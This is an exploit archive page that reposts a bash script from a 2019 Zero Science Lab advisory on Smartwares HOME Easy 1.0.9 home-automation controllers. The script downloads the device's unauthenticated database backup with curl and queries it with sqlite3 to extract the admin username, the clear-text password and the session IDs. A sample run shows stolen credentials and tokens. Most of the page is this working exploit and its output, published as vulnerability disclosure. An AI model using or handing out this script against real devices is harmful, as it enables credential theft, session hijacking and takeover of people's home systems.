exploit the possibilities

Smartwares HOME Easy 1.0.9 Database Backup Information Disclosure

Smartwares HOME Easy 1.0.9 Database Backup Information Disclosure
Posted Nov 6, 2019
Authored by LiquidWorm | Site zeroscience.mk

Smartwares HOME Easy versions 1.0.9 and below suffer from a database backup information disclosure vulnerability.

tags | exploit, info disclosure
MD5 | a90a2eeaa15741bc8a9528865b6bb7ec

Smartwares HOME Easy 1.0.9 Database Backup Information Disclosure

Change Mirror Download
#!/bin/bash
#
#
# Smartwares HOME easy v1.0.9 Database Backup Information Disclosure Exploit
#
#
# Vendor: Smartwares
# Product web page: https://www.smartwares.eu
# Affected version: <=1.0.9
#
# Summary: Home Easy/Smartwares are a range of products designed to remotely
# control your home using wireless technology. Home Easy/Smartwares is very
# simple to set up and allows you to operate your electrical equipment like
# lighting, appliances, heating etc.
#
# Desc: The home automation solution is vulnerable to unauthenticated database
# backup download and information disclosure vulnerability. This can enable the
# attacker to disclose sensitive and clear-text information resulting in authentication
# bypass, session hijacking and full system control.
#
# ==============================================================================
# root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004
# Target: http://192.168.1.177:8004
# Filename: 192.168.1.177:8004-16072019-db.sqlite
# Username: admin
# Password: s3cr3tP4ssw0rd
# Version: 1.0.9
# Sessions:
# ------------------------------------------------------------------
# * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy
# * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ
# * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9
# * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd
# * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH
# * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk
# ------------------------------------------------------------------
# ==============================================================================
#
# Tested on: Boa/0.94.13
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2019-5541
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php
#
#
# 30.09.2019
#
#


if [ "$#" -ne 1 ]; then
echo "Usage: $0 http://ip:port"
exit 0
fi
TARGET=$1
CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then
echo "No juice."
exit 1
fi
echo "Target: "$TARGET
FNAME=${TARGET:7}-$(date +"%d%m%Y")
curl -s $TARGET/data.dat -o $FNAME-db.sqlite
echo "Filename: $FNAME-db.sqlite"
echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin
echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111
echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3")
echo -ne "Sessions: \n"
printf "%0.s-" {1..66}
printf "\n"
sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*"
printf "%0.s-" {1..66} ; printf "\n\n"

Comments (1)

RSS Feed Subscribe to this comment feed
nadiakhan

Such a great piece of content and helpful website! Attractive information on your blog, thank you for taking the time and share with us. Expert essay writer delivers high-quality content related to experience. We have experienced professionals who can someone write my essay hold highest degree credentials and have vast years of helping the scholars.
myessayhelp.co.uk/essay-writer.html
myessayhelp.co.uk/write-my-essay.html

Comment by nadiakhan
2019-11-07 05:28:28 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    9 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close